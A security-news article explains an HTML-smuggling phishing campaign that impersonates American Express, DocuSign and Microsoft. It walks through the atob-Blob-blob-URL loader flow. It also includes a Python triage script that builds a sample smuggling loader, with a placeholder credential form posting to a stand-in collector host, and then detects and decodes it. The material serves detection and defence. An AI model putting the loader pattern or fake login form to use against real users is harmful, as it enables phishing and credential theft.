
Hackers Exploit HTML Smuggling for Devastating Phishing Attacks


Researchers discovered a phishing email impersonating American Express that used HTML smuggling to redirect users to a malicious website. The email contained a clickable link that led to a simple redirector, which then forwarded users to the final phishing site.

The HTML file loads an external JavaScript file containing a long Base64-encoded string; decoding that string reveals the actual HTML phishing page, which is the hallmark of HTML smuggling.

Phishing mail impersonating American Express.

The document-ready function waits for the page to load before executing the code within it. The encoded HTML string is then decoded with the atob function, revealing the plaintext HTML of the phishing page.

The function openFileURL creates a Blob object from the decoded HTML content, generates a URL referencing the Blob, and uses that URL to open the file in a new window for viewing or downloading.

The code then changes the current page's URL to a blob URL containing the HTML content, causing the browser to load it. To prevent memory leaks, the blob URL is revoked after a brief delay using setTimeout().

JavaScript code generates the encoded phishing page.

In short, the script converts a Base64-encoded HTML string into a Blob object, creates a URL for that Blob, and loads the resulting HTML in the current browser window, displaying the decoded content as a webpage.
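The same decode-Blob-navigate sequence is what a defender can look for when triaging a suspicious script. The following is an added example, not code from the article or from Trustwave: it takes a constructed loader shaped like the one described above (the smuggled page is a harmless placeholder form, not the real kit), flags the combination of atob(), Blob and URL.createObjectURL() with a long Base64 literal, decodes the literal to recover the hidden HTML, and pulls out any form action URLs so the credential collection endpoint can be blocked.

```python
import base64
import re

# Constructed sample loader mirroring the flow the article describes:
# decode with atob(), wrap in a Blob, navigate to the blob: URL, revoke later.
# SAMPLE_PAGE is a harmless stand-in for the smuggled phishing page.
SAMPLE_PAGE = (
    "<html><body><h1>Example Card Services</h1>"
    "<form action='https://collector.example.invalid/submit' method='post'>"
    "<input name='user'><input name='pass' type='password'>"
    "<button>Log in</button></form></body></html>"
)
SAMPLE_SCRIPT = (
    "$(document).ready(function(){"
    "var enc='" + base64.b64encode(SAMPLE_PAGE.encode()).decode() + "';"
    "var html=atob(enc);"
    "var blob=new Blob([html],{type:'text/html'});"
    "var url=URL.createObjectURL(blob);"
    "window.location.href=url;"
    "setTimeout(function(){URL.revokeObjectURL(url);},1000);});"
)

# API calls that, together with a long Base64 literal, form the smuggling pattern.
SMUGGLING_APIS = ("atob(", "new Blob(", "URL.createObjectURL(", "URL.revokeObjectURL(")
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")
FORM_ACTION_RE = re.compile(r"action\s*=\s*['\"]([^'\"]+)", re.I)


def find_smuggled_html(script: str) -> dict:
    """Triage a script: list smuggling APIs present, decode long Base64 literals
    that turn out to be HTML, and extract form action URLs from each payload."""
    apis = [api for api in SMUGGLING_APIS if api in script]
    payloads = []
    for match in BASE64_RE.finditer(script):
        try:
            decoded = base64.b64decode(match.group(0), validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid Base64 (e.g. a long identifier or hash)
            continue
        if re.search(r"<(html|form|input|script)\b", decoded, re.I):
            payloads.append({
                "offset": match.start(),
                "html": decoded,
                "form_actions": FORM_ACTION_RE.findall(decoded),
            })
    # Verdict: client-side decode plus an object URL plus a hidden HTML document.
    suspicious = "atob(" in apis and "URL.createObjectURL(" in apis and bool(payloads)
    return {"apis": apis, "payloads": payloads, "suspicious": suspicious}


if __name__ == "__main__":
    report = find_smuggled_html(SAMPLE_SCRIPT)
    print("suspicious:", report["suspicious"], "apis:", report["apis"])
    for payload in report["payloads"]:
        print("form actions:", payload["form_actions"])
```

The Base64 length threshold and the HTML tag check are heuristics chosen for this example; tune them to the scripts you actually see in mail attachments.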

Cybercriminals exploit Blob URLs through HTML smuggling to create malicious files within the browser using JavaScript, which allows them to bypass server-side security measures and deliver harmful content directly to the user.

They use JavaScript to create malicious files locally on user devices; because the files are generated within the browser, they evade traditional security measures that monitor external downloads, making them difficult to detect and block.

Generated blob HTML phishing page mimicking American Express.

Malicious files generated locally within a browser can deliver harmful payloads disguised as legitimate content. They are difficult to detect and block, can be used to exploit browser vulnerabilities, and are harder to trace because they are created on the user's own machine rather than downloaded from a server.

According to Trustwave, the phishing pages employ HTML smuggling to deceive users into believing they are interacting with legitimate websites such as DocuSign and Microsoft.

By embedding malicious code within seemingly innocuous HTML elements, these pages trick victims into divulging sensitive information or downloading malware.

A generated HTML phishing page mimicking Microsoft.

HTML smuggling is a growing security threat in which phishing content is hidden within seemingly harmless HTML files. Techniques such as blob URLs, which reference hidden blob data from JavaScript, let the content bypass traditional security measures and reach unsuspecting users.

It will likely become more sophisticated in phishing attacks. Expect more convincing fake emails carrying hidden HTML code that require more user interaction but remain effective.
